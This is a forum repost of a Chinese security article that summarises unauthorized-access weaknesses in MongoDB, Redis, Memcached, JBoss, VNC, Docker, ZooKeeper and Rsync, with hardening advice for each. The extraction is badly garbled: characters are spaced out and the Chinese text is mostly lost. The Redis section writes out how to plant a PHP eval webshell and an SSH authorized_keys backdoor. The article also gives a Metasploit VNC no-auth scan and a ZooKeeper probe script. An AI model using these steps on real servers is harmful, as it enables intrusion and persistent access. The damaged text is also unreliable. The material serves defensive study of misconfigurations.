[21320] 2020-10-20_未授权访问漏洞总结

文档创建者:s7ckTeam
浏览次数:19
最后更新:2025-01-18
2020-10-20_未授权访问漏洞总结 访 L e m o n S e c   2 0 2 0 - 1 0 - 2 0 k a r l b r a i n           F r e e B u f . C O M 访 访 访 访 访 1 . M o n g o D B   访 2 . R e d i s   访 3 . M e m c a c h e d   访 C V E - 2 0 1 3 - 7 2 3 9 4 . J B O S S   访 5 . V N C   访 6 . D o c k e r   访 7 . Z o o K e e p e r   访 8 . R s y n c   访 M o n g o D B   访 访 ( 1 )     M o n g o D B   访   2 7 0 1 7   M o n g o D B   a d m i n     a d m i n     a d m i n . s y s t e m . u s e r s   使 M o n g o D B     a u t h     a u t h     a d m i n . s y s t e m . u s e r s   ( 2 )   ( 3 )   ( 4 )   M o n g o D B   ( 1 )     1 2 7 . 0 . 0 . 1 - - b i n d _ i p   1 2 7 . 0 . 0 . 1 o r v i m   / e t c / m o n g o d b . c o n f b i n d _ i p   =   1 2 7 . 0 . 0 . 1
( 2 )     a u t h     ( 1 )     M o n g o D B     M o n g o D B     - a u t h       M o n g o D B   ( 2 )     H T T P     R E S T   M o n g o D B     H T T P     R E S T     2 . 6   M o n g o D B   使   W e b     W e b     - n o h t t p i n t e r f a c e     n o h t t p i n t e r f a c e   =   f a l s e ( 3 )     I P   / e t c / m o n g o d b . c o n f     R e d i s   访 访 ( 1 )   R e d i s     K e y   -   V a l u e   R e d i s     m e m c a c h e d     K e y / V a l u e R e d i s     0 . 0 . 0 . 0 : 6 3 7 9 R e d i s   访 访   R e d i s     R e d i s   访   R e d i s     R e d i s     R e d i s   使 ( 2 )   ( 3 )   ( 4 )   R e d i s   b i n d _ i p   =   1 2 7 . 0 . 0 . 1 m o n g o d   - - a u t h o r v i m   / e t c / m o n g o d b . c o n f a u t h   =   t r u e u s e   a d m i n   #   使   a d m i n   d b . a d d U s e r   #   d b . a u t h , #     1   - - b i n d _ i p   1 2 7 . 0 . 0 . 1 b i n d _ i p   =   1 2 7 . 0 . 0 . 1
    n m a p     6 3 7 9     R e d i s     N m a p     6 3 7 9     R e d i s   访     R e d i s     d e l   k e y     S S H   c r o n t a b     s h e l l   ( 1 )       r e d i s                       w e b s h e l l ( 2 )     S S H       s s h         R e d i s     K e y     t e s t     R e d i s   N m a p   - A   - p   6 3 7 9   - - s c r i p t   r e d i s - i n f o   1 9 2 . 1 6 8 . 1 0 . 1 5 3 . / r e d i s - c l i   - h   1 9 2 . 1 6 8 . 1 0 . 1 5 3 I n f o r e d i s - c l i . e x e   - h   I P c o n f i g   s e t   d i r   / v a r / w w w / h t m l   W e b   c o n f i g   s e t   d b f i l e n a m e   r e d i s 8 8 . p h p s e t   w e b s h e l l   " < ? p h p   @ e v a l ( $ _ P O S T [ ' 1 2 3 ' ] ) ;   ? > " s a v e s s h - k e y g e n - t r s a ( e c h o   - e   " n n " ;   c a t   i d _ r s a . p u b ;   e c h o   - e   " n n " )   >   t e s t . t x t c a t   t e s t . t x t   |   r e d i s   - c l i   - h   < h o s t n a m e >   - x   s e t   t e s t
  R e d i s     s a v e   s a v e     R e d i s   s n a p s h o t   R D B   s a v e     t e s t     / r o o t / . s s h     ( 1 )     R e d i s   访   r e d i s . c o n f     r e q u i r e p a s s   r e d i s   访 r e d i s   ( 2 )     b i n d     R e i d s     I P   6 3 7 9 ( 3 )     R e d i s   ( 4 )   M e m c a c h e d   访 访 C V E - 2 0 1 3 - 7 2 3 9 ( 1 )   M e m c a c h e d     K e y   -   V a l u e   访   M e m c a c h e d     M e m c a c h e d   ( 2 )   ( 3 )   C V E - 2 0 1 3 - 7 2 3 9   ( 4 )   M e m c a c h e d     n e t s t a t   - a n   |   m o r e     0 . 0 . 0 . 0 : 1 1 2 1 1 1 1 2 1 1   M e m c a c h e d   访 r e d i s - c l i   - h   < h o s t n a m e > k e y s   * g e t   t e s t c o n f i g   s e t   d i r   " / r o o t / . s s h " c o n f i g   s e t   d b f i l e n a m e   " a u t h o r i z e d _ k e y s " s s h   @ < I P > t e l n e t   < t a r g e t >   1 1 2 1 1 o r
使   n m a p     ( 1 )   访   I p t a b l e s   访 访   ( 2 )   b i n d     I P   M e m c a c h e d     M e m c a c h e d     I P   1 2 7 . 0 . 0 . 1 ( 3 )   使   m e m c a c h e d     ( 4 )     1 1 2 1 1     1 1 2 2 2     ( 5 )   J B O S S   访 访 ( 1 )   J B O S S   E A P   J 2 E E   访   h t t p : / / i p : 8 0 8 0 / j m x - c o n s o l e     j b o s s   ( 2 )   ( 3 )   ( 4 )   J B O S S     n m a p     J B O S S   使   j m x   访 h t t p : / / i p : j b o s s /     j m x - c o n s o l e     w e b - c o n s o l e       J M X   C o n s o l e       % J B O S S _ H O M E % / s e r v e r / d e f a u l t / d e p l o y / j m x - c o n s o l e . w a r / W E B - I N F / j b o s s - w e b . x m l     x m l n c   - v v   < t a r g e t >   1 1 2 1 1 n m a p   - s V   - p 1 1 2 1 1   - - s c r i p t   m e m c a c h e d - i n f o   < t a r g e t > i p t a b l e s   - A   I N P U T   - p   t c p   - s   1 9 2 . 1 6 8 . 0 . 2   - - d p o r t   1 1 2 1 1   - j   A C C E P T m e m c a c h e d   - d   - m   1 0 2 4   - u   m e m c a c h e d   - l   1 2 7 . 0 . 0 . 1   - p   1 1 2 1 1   - c   1 0 2 4   - P   / t m p / m e m c a c h e d . p i d m e m c a c h e d   - d   - m   1 0 2 4   - u   m e m c a c h e d   - l   1 2 7 . 0 . 0 . 1   - p   1 1 2 1 1   - c   1 0 2 4   - P   / t m p / m e m c a c h e d . p i d m e m c a c h e d   - d   - m   1 0 2 4   - u   m e m c a c h e d   - l   1 2 7 . 0 . 0 . 1   - p   1 1 2 2 2   - c   1 0 2 4   - P   / t m p / m e m c a c h e d . p i d
    j b o s s - w e b . x m l     w e b . x m l   x m l     G E T     P O S T     s e c u r i t y - c o n s t r a i n t   ,   h e a d   % J B O S S _ H O M E % s e r v e r d e f a u l t c o n f p r o p s j b o s s w s - u s e r s . p r o p e r t i e s     a d m i n / a d m i n   % J B O S S _ H O M E % s e r v e r d e f a u l t c o n f p r o p s j b o s s w s - r o l e s . p r o p e r t i e s     =     ,     a d m i n     J B o s s A d m i n     H t t p I n v o k e r     V N C   访 访 ( 1 )   V N C   V i r t u a l   N e t w o r k   C o n s o l e #   A   s a m p l e   r o l e s . p r o p e r t i e s   f i l e   f o r u s e   w i t h   t h e   U s e r s R o l e s L o g i n M o d u l e k e r m i t   =   J B o s s A d m i n , H t t p I n v o k e r
A T & T V N C   U N X I     L i n u x     V N C   S e r v e r     V N C V i e w e r   V N C     5 9 0 0 5 9 0 1 V N C   访 ( 2 )   ( 3 )   ( 4 )   V N C   使   m e t a s p l o i t   ( 1 )     k a l i     m s f c o n s o l e m s f c o n s o l e ( 2 )     V N C   u s e   a u x i l i a r y / s c a n n e r / v n c / v n x n o n e a u t h ( 3 )   s h o w   o p t i o n s ( 4 )   s e t   r h o s t s   i p     ( 5 )   线 s e t   t h r e a d s   5 0 ( 6 )   r u n ( 1 )     V N C   ( 2 )   D o c k e r   访 访 ( 1 )   D o c k e r     V M s b a r e   m e t a l O p e n S t a c k   D o c k e r     1 . 3     1 . 6 宿 ( 2 )   ( 3 )   ( 4 )   D o c k e r   1 . 3 D o c k e r   1 . 6   n m a p   2 3 7 5   d o c k e r   u r l     i p : 2 3 7 5 / v e r s i o n     c o n t a i n e r i m a g e     ( 1 )   使   T L S   ( 2 )   访 N e t w o r k   A c c e s s   C o n t r o l
Z o o K e e p e r   访 访 ( 1 )   Z o o K e e p e r     G o o g l e     C h u b b y   H a d o o p     H b a s e   Z o o K e e p e r     2 1 8 1   访   e n v i   J a v a   访   k i l l   ( 2 )   ( 3 )   ( 4 )   Z o o k e e p e r   ( 1 )     n m a p     2 1 8 1   ( 2 )     s o c k e t     2 1 8 1     e n v i     Z o o K e e p e r   访 #   c o d i n g = u t f - 8 i m p o r t   s o c k e t i m p o r t   s y s d e f   c h e c k ( i p ,   p o r t ,   t i m e o u t ,   c m d ) :         t r y :                 s o c k e t . s e t d e f a u l t t i m e o u t ( t i m e o u t )                 s   =   s o c k e t . s o c k e t ( s o c k e t . A F _ I N E T ,   s o c k e t . S O C K _ S T R E A M )                 s . c o n n e c t ( ( i p ,   i n t ( p o r t ) ) )                 s . s e n d ( c m d ) d a t a   =   s . r e c v ( 1 0 2 4 )                 s . c l o s e ( )                 p r i n t   d a t a e x c e p t :                 p a s s d e f   m a i n ( ) : i f   l e n ( s y s . a r g v )   <   3 : e x i t ( )         i p   =   s y s . a r g v [ 1 ]         c m d   =   s y s . a r g v [ 2 ] #   e n v i #   d u m p #   r e q s #   r u o k #   s t a t c h e c k ( i p ,   2 1 8 1 ,   3 ,   c m d )
  ( 1 )     Z o o K e e p e r   ( 2 )     Z o o K e e p e r   R s y n c   访 访 ( 1 )   R s y n c r e m o t e   s y n c h r o n i z e   L A N / W A N   R s y n c   访 R s y n c     8 3 7 ( 2 )   ( 3 )   ( 4 )   R s y n c   n m a p   n m a p   i p   - p 8 3 7 r s y n c   i p r o o t ( 1 )     m o d u l e     l i s t   = f a l s e ( 2 )     m o d u l e     R e a d   o n l y   =   t r u e ( 3 )   访 使 访 访 h o s t s   a l l o w   =   1 2 3 . 1 2 3 . 1 2 3 . 1 2 3 ( 4 )   使   r s y n c   ( 5 )   R s y n c     R s y n c   使   s s h _ _ _ _ _   e n d   _ _ _ _ _ c h e c k ( i p ,   2 1 8 1 ,   3 ,   c m d ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' : m a i n ( )
H W c t f -   - a n d r o i d L e m o n S e c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则